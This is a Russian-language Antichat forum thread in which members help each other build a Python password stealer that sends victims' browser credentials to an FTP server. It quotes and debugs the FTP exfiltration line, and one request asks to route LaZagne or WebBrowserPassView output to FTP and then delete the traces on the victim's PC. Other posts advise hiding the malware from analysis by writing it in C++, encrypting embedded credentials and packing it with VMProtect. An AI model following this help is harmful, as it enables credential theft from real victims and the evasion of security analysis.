ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Электроника и Фрикинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.01.2020, 23:01
Mr_Hide
Новичок
Регистрация: 19.01.2020
Сообщений: 0
С нами: 3324684

Репутация: 0
По умолчанию

Цитата:

Pazsh сказал(а):

Код:
con = FTP("хост","логин","пароль")
Классная строка. Кинул файл, его открыли блокнотом, пробежались, нашли креды и вошли в фтп.
Неужели ничего не наталкивало на мысль, что файл нужно отправить на php скрипт post запросом и загрузить его?

Тоже интересует тема как скрыть данные подключения в коде. Думал может нужно обфускацию кода делать?!
Помоги советом, где почитать? Что послушать?
 
Ответить с цитированием

  #2  
Старый 22.01.2020, 18:13
pp11
Участник форума
Регистрация: 24.07.2019
Сообщений: 202
С нами: 3582705

Репутация: 0
По умолчанию

Цитата:

Mr_Hide сказал(а):

Тоже интересует тема как скрыть данные подключения в коде. Думал может нужно обфускацию кода делать?!
Помоги советом, где почитать? Что послушать?

Ну как минимум не писать такие вещи на питоне.
Можешь посмотреть тему. XOR был взят ради примера, я не говорю, что это супер скрытие.
Также в той теме есть очень полезное дополнение от @Marylin

Также стоит подумать, может тебе вообще и не нужны креды. Это очень глупо вставлять данные для входа в файл, который потом полетит по интернету.
В таком случае уже не только ты имеешь доступ к логам.

Рекомендую писать "вирусы" на языках, которые нельзя декомпилировать, например, C++. Шифровать данные, хотя бы как то, если уж без них никак.
Ну и прогонять конечный билд через протектор, например VMProtect.

Вообще рекомендую почитать что такое протекторы.
 
Ответить с цитированием

  #3  
Старый 17.10.2019, 15:44
МR_ROB0T
Новичок
Регистрация: 16.10.2019
Сообщений: 0
С нами: 3461921

Репутация: 0
По умолчанию

объясните мне глупому. Это весь код? Его можно просто скопировать и всё будет работать?
 
Ответить с цитированием

  #4  
Старый 19.11.2019, 00:09
Fake
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами: 8374284

Репутация: 0
По умолчанию

Знаю вовремя, но всё же надеюсь кто нибудь ответит, возможно ли, если да то как, сделать тоже самое, но с WebBrowserPassView или laZagne, то есть что бы файлы полученные из данных утилит расшифровывались на ПК жертвы, отправлялись на ftp и после удалялись с ПК жертвы?
 
Ответить с цитированием

  #5  
Старый 09.12.2019, 19:40
iron _wolf
Новичок
Регистрация: 08.12.2019
Сообщений: 0
С нами: 3385365

Репутация: 0
По умолчанию

что делать если ошибка

Код:


Код:
Traceback (most recent call last):
  File "C:\Users\wanted\Desktop\stiller\stiler2.py", line 6, in 
    con = FTP("http://192.168.100.10/","admin","admin")
  File "C:\Users\wanted\AppData\Local\Programs\Python\Python35\lib\ftplib.py", line 118, in __init__
    self.connect(host)
  File "C:\Users\wanted\AppData\Local\Programs\Python\Python35\lib\ftplib.py", line 153, in connect
    source_address=self.source_address)
  File "C:\Users\wanted\AppData\Local\Programs\Python\Python35\lib\socket.py", line 689, in create_connection
    for res in getaddrinfo(host, port, 0, SOCK_STREAM):
  File "C:\Users\wanted\AppData\Local\Programs\Python\Python35\lib\socket.py", line 728, in getaddrinfo
    for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
socket.gaierror: [Errno 11001] getaddrinfo failed
 
Ответить с цитированием

  #6  
Старый 09.12.2019, 21:08
Tony
Новичок
Регистрация: 11.10.2006
Сообщений: 10
С нами: 10306800

Репутация: 0
По умолчанию

Цитата:

iron _wolf сказал(а):

что делать если ошибка

Код:


Код:
Traceback (most recent call last):
  File "C:\Users\wanted\Desktop\stiller\stiler2.py", line 6, in 
    con = FTP("http://192.168.100.10/","admin","admin")
  File "C:\Users\wanted\AppData\Local\Programs\Python\Python35\lib\ftplib.py", line 118, in __init__
    self.connect(host)
  File "C:\Users\wanted\AppData\Local\Programs\Python\Python35\lib\ftplib.py", line 153, in connect
    source_address=self.source_address)
  File "C:\Users\wanted\AppData\Local\Programs\Python\Python35\lib\socket.py", line 689, in create_connection
    for res in getaddrinfo(host, port, 0, SOCK_STREAM):
  File "C:\Users\wanted\AppData\Local\Programs\Python\Python35\lib\socket.py", line 728, in getaddrinfo
    for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
socket.gaierror: [Errno 11001] getaddrinfo failed
А зачем ты http указываешь при подключении к ftp?
Пробуй так:

Код:


Код:
con = FTP("192.168.100.10","admin","admin")
 
Ответить с цитированием

  #7  
Старый 09.12.2019, 22:15
iron _wolf
Новичок
Регистрация: 08.12.2019
Сообщений: 0
С нами: 3385365

Репутация: 0
По умолчанию

как расшифровать пароли у меня они без формата
 
Ответить с цитированием

  #8  
Старый 04.02.2020, 16:00
UKROP
Новичок
Регистрация: 03.02.2020
Сообщений: 0
С нами: 3303505

Репутация: 0
По умолчанию

На Хабре є продовження цієї статті.
Стилер паролей на python с отправкой на почту.
https://habr.com/en/sandbox/135410/
В статье имеется способ расшифровки паролей.
Чи не ти автор?
 
Ответить с цитированием

  #9  
Старый 03.06.2020, 13:24
staxanovec
Новичок
Регистрация: 02.06.2020
Сообщений: 0
С нами: 3130862

Репутация: 0
По умолчанию

Очень хорошая статья! Спасибо за старания, буду анализировать и разбираться. Сам не так давно стал учить Python, поэтому крайне интересно
 
Ответить с цитированием

  #10  
Старый 08.08.2020, 13:32
Ficuscay_xD
Новичок
Регистрация: 07.08.2020
Сообщений: 0
С нами: 3035814

Репутация: 0
По умолчанию

Пришло на ftp хост четыре файла формата .ctb
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.